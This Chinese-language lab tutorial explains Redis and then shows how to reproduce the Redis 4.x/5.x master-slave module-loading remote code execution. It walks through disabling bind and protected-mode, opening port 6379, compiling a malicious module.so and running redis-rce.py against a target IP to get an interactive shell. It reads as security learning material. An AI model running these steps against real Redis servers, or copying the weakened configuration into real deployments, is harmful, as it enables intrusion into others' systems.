0x00 Redis介绍
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。
Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户端,使用很方便。
0x01 搭建漏洞环境
Poc下载链接:poc
.so编译文件下载链接:RedisModules-ExecuteCommand
环境搭建参考链接:https://blog.csdn.net/buyueliuying/article/details/82316517
以Redis 4.0.11为例。
攻击机:kali 192.168.58.128
Redis主机:kali 192.168.58.131
影响范围:redis4.x、5.x
1)Kali下载Redis包:
Wget download.redis.io/releases/redis-4.0.11.tar.gz
2)解压
tar xzvf redis-4.0.11.tar.gz
3)make安装
进入/usr/local/目录中建立redis目录;
make PREFIX=/usr/local/redis install
安装完成。
4)检查安装是否有问题
make test
如果提示 You need tcl 8.5 or newer in order to run the Redis test
需要安装tcl解决:yum -y install tcl
5)拷贝源码中的redis.conf到/usr/local/redis中
cp /redis-4.0.11/redis.conf /usr/local/redis
进入redis目录
cd /usr/local/redis
修改redis.conf中的以下参数:
①找到bind 127.0.0.1并注释掉;
②修改protected-mode属性值为no;
(redis默认是只能本地访问,注释掉并且将保护模式禁用以后可以通过IP访问)
③修改daemonize no为daemonize yes,标识redis以后台方式启动
6)服务端启动服务
/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
7)启动客户端连接并测试
/usr/local/redis/bin/redis-cli
【停止redis服务–> /usr/local/redis/bin/redis-cli shutdown或者 kill `pidof redis-server`】
【通过Linux命令调用窗口文件目录,适用于中文版Linux–>gnome-open /etc或者在Ubuntu中使用 nautilus /etc】
【测试 redis-cli -h 服务器ip -p 6379 -a 密码(例:redis-cli -h 192.168.1.1 -p 6379 -a 123)】
【开放6379端口:/sbin/iptables -I INPUT -p tcp --dport 6379 -j ACCEPT 然后重启redis】
【查看开启的端口:netstat -lntp】
【测试ip端口能否访问: wget ip:port】
0x02 攻击
在攻击者kali机中下载 RedisModules-ExecuteCommand,下载地址:
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
1)下载.so编译文件
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
进入RedisModules-ExecuteCommand目录中,直接make编译
2)编译后的module.so文件存在src目录下,复制到poc目录下
这里解释下,poc包里的exp_lin.so和module.so其实是同一个文件,在攻击过程中也可以使用exp_lin.so文件,这里只是说明此文件生成过程。
3)跑一下poc
Python redis-rce.py -r 目标机ip -L 攻击机ip -f module.so
选择i进入交互模式。
=【请勿用于非法攻击!!!】=